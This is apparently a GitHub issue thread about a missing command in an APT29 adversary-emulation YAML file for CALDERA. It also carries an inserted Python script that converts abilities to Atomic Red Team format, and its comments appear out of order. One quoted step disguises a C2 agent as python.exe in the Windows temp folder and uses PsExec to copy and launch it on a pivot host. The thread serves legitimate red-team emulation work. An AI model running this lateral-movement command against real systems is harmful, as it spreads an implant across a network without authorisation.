Missing code in the APT29 yaml file #92
Comments
Hello,

It is missing, but it should not be a problem execution-wise, as the part that is actually executed by caldera is line 1722:

```yaml
platforms:
  windows:
    psh,pwsh:
      command: |
        move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force;
        set-location "C:\Program Files\SysinternalsSuite\";
        .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}";
        tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe";
      payloads:
      - sandcat.go-windows-upx
```
Thanks for your fast reply.

I'm currently a student and I'm trying to build a conversion script (like "ctid_aep_to_caldera.py") in order to use the yaml file with the Atomic framework. It is easier for me to directly copy the "executor" part because the Atomic yaml file is very similar (example below). By the way, don't you have that kind of script to convert to ATOMIC?

Atomic YAML file:

```yaml
supported_platforms:
- windows
input_arguments:
  powershell_command:
    description: PowerShell command to encode
    type: String
    default: Write-Host "Hey, Atomic!"
executor:
  command: |
    ### PWS code ###
  name: powershell
```
On Fri, 2 Jul 2021 at 11:21, Thamane ***@***.***> wrote:

> Hello,
> It is missing but it should not be a problem execution wise as the part that is actually executed by caldera is line 1722 <https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/6e8b057cf176619468fa3200c09dbdac4789f5f2/apt29/Emulation_Plan/yaml/APT29.yaml#L1722>:
> [the `platforms:` block quoted in the comment above]
--
Regards.
Guillaume MULLER
Sorry, I do not have such a script at hand. In your case, just copying the command at line 1722 and pasting it at line 1749 will solve your problem. The `executors` yaml key is not parsed by caldera and is probably here for backward compatibility/cross compatibility with other frameworks like ATOMIC? At least that is what is explained in this blog article:
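As an added example (not code from the adversary_emulation_library project or from either commenter), the following Python script does both things discussed in this thread: it fills an empty `executors` command from the `platforms` block, which is the manual fix suggested above, and it converts the ability into an Atomic Red Team style test dict. It goes one step beyond the thread by turning CALDERA fact references such as `#{user.session.id}` into Atomic `input_arguments`, since Atomic argument names cannot contain dots. The sample ability, its placeholder id and benign command, and the helper names (`windows_command`, `fill_missing_executor`, `to_atomic_test`) are constructed for this illustration; PyYAML is optional and only used for printing the result as YAML.

```python
"""Added example for this thread, not code from the adversary_emulation_library
project: copy a CALDERA ability's Windows PowerShell command into an empty
`executors` entry (the manual fix suggested above) and convert the ability
into an Atomic Red Team style test. Sample data and helper names are constructed."""
from copy import deepcopy
import re

try:
    import yaml  # PyYAML, used only by main() to print the result as YAML
except ImportError:  # the conversion itself needs nothing outside the stdlib
    yaml = None

# Constructed sample ability: the `executors` command is empty, which is the
# defect reported in the issue. The command is a benign placeholder; the fact
# references (#{server}, #{user.session.id}) mirror the ones the thread shows.
SAMPLE_ABILITY = {
    "id": "00000000-0000-4000-8000-000000000000",  # placeholder, not a real ability id
    "name": "Example ability",
    "technique": {"attack_id": "T1105", "name": "Ingress Tool Transfer"},
    "platforms": {
        "windows": {
            "psh,pwsh": {
                "command": 'Write-Host "Hey, Atomic! #{server} #{user.session.id}";\n',
                "payloads": ["example-payload.txt"],
            }
        }
    },
    "executors": [{"name": "powershell", "command": ""}],
}

# CALDERA fact references: #{server}, #{user.session.id}, ...
FACT_RE = re.compile(r"#\{([A-Za-z0-9_.]+)\}")


def windows_command(ability):
    """Return the first Windows PowerShell command of a CALDERA ability.

    CALDERA keys executors by comma-separated names ("psh,pwsh"), so the key
    has to be split before matching."""
    windows = ability.get("platforms", {}).get("windows", {})
    for executor_names, spec in windows.items():
        names = {n.strip() for n in executor_names.split(",")}
        if names & {"psh", "pwsh"}:
            return spec.get("command", "")
    return ""


def fill_missing_executor(ability):
    """Return a copy in which every empty powershell `executors` command is
    filled from the `platforms` block (the fix suggested in the thread)."""
    fixed = deepcopy(ability)
    cmd = windows_command(fixed)
    for ex in fixed.get("executors", []):
        if ex.get("name") == "powershell" and not (ex.get("command") or "").strip():
            ex["command"] = cmd
    return fixed


def to_atomic_test(ability):
    """Build an Atomic Red Team style test dict from a CALDERA ability.

    Every CALDERA fact reference becomes an Atomic input argument; dots are
    replaced because Atomic argument names are plain identifiers."""
    cmd = windows_command(ability)
    args = {}
    for fact in FACT_RE.findall(cmd):
        arg = fact.replace(".", "_")
        args[arg] = {
            "description": f"Value for CALDERA fact {fact}",
            "type": "String",
            "default": "",
        }
        cmd = cmd.replace("#{" + fact + "}", "#{" + arg + "}")
    return {
        "name": ability.get("name", ""),
        "description": ability.get("technique", {}).get("name", ""),
        "supported_platforms": ["windows"],
        "input_arguments": args,
        "executor": {"name": "powershell", "command": cmd},
    }


def main():
    fixed = fill_missing_executor(SAMPLE_ABILITY)
    test = to_atomic_test(fixed)
    if yaml is not None:
        print(yaml.safe_dump(test, sort_keys=False))
    else:
        print(test)


if __name__ == "__main__":
    main()
```

To run it against the real plan, load the ability list with `yaml.safe_load`, pass each ability dict through `fill_missing_executor` and `to_atomic_test`, and dump the results; the conversion works on parsed dicts so it does not depend on line numbers such as 1722 or 1749.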
In the APT29 yaml file, at line 1749, the command of T1105 is missing below the "executors" tag:

```
line 1746   executors:
line 1747   - name: powershell
line 1748     command: |
line 1749
line 1750 - id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a
```